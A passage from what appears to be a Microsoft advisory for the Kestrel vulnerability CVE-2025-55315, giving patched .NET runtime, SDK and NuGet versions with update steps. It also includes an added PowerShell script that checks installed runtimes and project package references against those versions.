  https://aka.ms/dotnet/download
  • If you're using .NET 8.0, you should download and install .NET 8.0.21 Runtime or .NET 8.0.318 SDK (for Visual Studio 2022 v17.10 latest update) from https://dotnet.microsoft.com/download/dotnet-core/8.0.

  • If you're using .NET 9.0, you should download and install .NET 9.0.10 Runtime or .NET 9.0.111 SDK (for Visual Studio 2022 v17.12 latest update) from https://dotnet.microsoft.com/download/dotnet-core/9.0.

  • If you're using .NET 10.0, you should download and install .NET 10.0.0-rc.2.25476.107 Runtime or .NET 10.0.100-rc.2.25476.107 SDK (for Visual Studio 2022 v17.12 latest update) from https://dotnet.microsoft.com/download/dotnet-core/10.0.

  • If you're using Microsoft.AspNetCore.Server.Kestrel.Core nuget package, update to the latest version 2.3.6 using either of the following methods:

    • Using the NuGet Package Manager UI in Visual Studio:
      - Open your project in Visual Studio.
      - Right-click on your project in Solution Explorer and select "Manage NuGet Packages..." or navigate to "Project > Manage NuGet Packages".
      - In the NuGet Package Manager window, select the "Updates" tab. This tab lists packages with available updates from your configured package sources.
      - Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.
      - Click the "Update" button.

    • Using the NuGet Package Manager Console in Visual Studio:
      - Open your project in Visual Studio.
      - Navigate to "Tools > NuGet Package Manager > Package Manager Console".
      - To update a specific package to its latest version, use the Update-Package command:
      Code:

            Update-Package -Id Microsoft.AspNetCore.Server.Kestrel.Core
      
    • Using the .NET CLI (Command Line Interface):
      Open a terminal or command prompt in your project's directory.
      To update a specific package to its latest version:
      Code:

            dotnet add package Microsoft.AspNetCore.Server.Kestrel.Core
      

Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.

Additionally, if you've deployed self-contained applications targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
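An added example, not from Microsoft's advisory, that automates the "How do I know if I am affected?" question above: it reads the installed ASP.NET Core runtimes from the dotnet CLI and scans project files for the Kestrel package, comparing both against the affected and patched versions listed in the tables. It assumes the dotnet CLI is on PATH and that projects use PackageReference (with a Version attribute or child element).

```powershell
# Added example, not from the advisory: compare installed ASP.NET Core runtimes and
# Kestrel package references against the CVE-2025-55315 affected/patched versions above.

$kestrelPatched = [version]'2.3.6'
$patched10      = '10.0.0-rc.2.25476.107'   # prerelease versions are compared as ordinal strings

function Get-AspNetCoreRuntimeStatus {
    # "dotnet --list-runtimes" prints one line per runtime, for example:
    #   Microsoft.AspNetCore.App 9.0.0 [/usr/local/share/dotnet/shared/Microsoft.AspNetCore.App]
    foreach ($line in (& dotnet --list-runtimes 2>$null)) {
        if ($line -notmatch '^Microsoft\.AspNetCore\.App (\S+) \[(.+)\]$') { continue }
        $ver  = $Matches[1]
        $path = $Matches[2]          # captured now, because switch -Regex overwrites $Matches
        $v    = $ver -as [version]   # $null for prerelease strings such as 10.0.0-rc.1.25451.107
        $status = switch -Regex ($ver) {
            '^8\.'       { if ($v -and $v -le [version]'8.0.20') { 'VULNERABLE, update to 8.0.21' } else { 'patched' }; break }
            '^9\.'       { if ($v -and $v -le [version]'9.0.9')  { 'VULNERABLE, update to 9.0.10' } else { 'patched' }; break }
            '^10\.0\.0-' { if ([string]::CompareOrdinal($ver, $patched10) -lt 0) { "VULNERABLE, update to $patched10" } else { 'patched' }; break }
            default      { 'not covered by this advisory' }
        }
        [pscustomobject]@{ Runtime = "Microsoft.AspNetCore.App $ver"; Path = $path; Status = $status }
    }
}

function Get-KestrelPackageStatus {
    param([string]$Path = '.')
    Get-ChildItem -Path $Path -Recurse -Include *.csproj, *.fsproj, *.vbproj -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_.FullName
            [xml]$proj = Get-Content -Path $file -Raw
            # GetElementsByTagName ignores the MSBuild namespace that classic projects declare
            foreach ($ref in $proj.GetElementsByTagName('PackageReference')) {
                if ($ref.GetAttribute('Include') -ne 'Microsoft.AspNetCore.Server.Kestrel.Core') { continue }
                $ver = $ref.GetAttribute('Version')
                if (-not $ver) { $ver = $ref.Version }      # <Version> child element form
                $parsed = $ver -as [version]
                $status = if ($parsed -and $parsed -ge $kestrelPatched) { 'patched' } elseif ($parsed) { 'VULNERABLE, update to 2.3.6' } else { "check manually (version '$ver')" }
                [pscustomobject]@{ Project = $file; Version = $ver; Status = $status }
            }
        }
}

Get-AspNetCoreRuntimeStatus | Format-Table -AutoSize
Get-KestrelPackageStatus -Path . | Format-Table -AutoSize
```

Self-contained deployments carry their own copy of the runtime, so a "patched" result for the machine-wide runtimes says nothing about them; those must be rebuilt and redeployed as the advisory states.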

Other Information

Reporting Security Issues

If you have found a potential security issue in .NET 8.0, .NET 9.0 or .NET 10.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.

Support

You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/aspnetcore. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.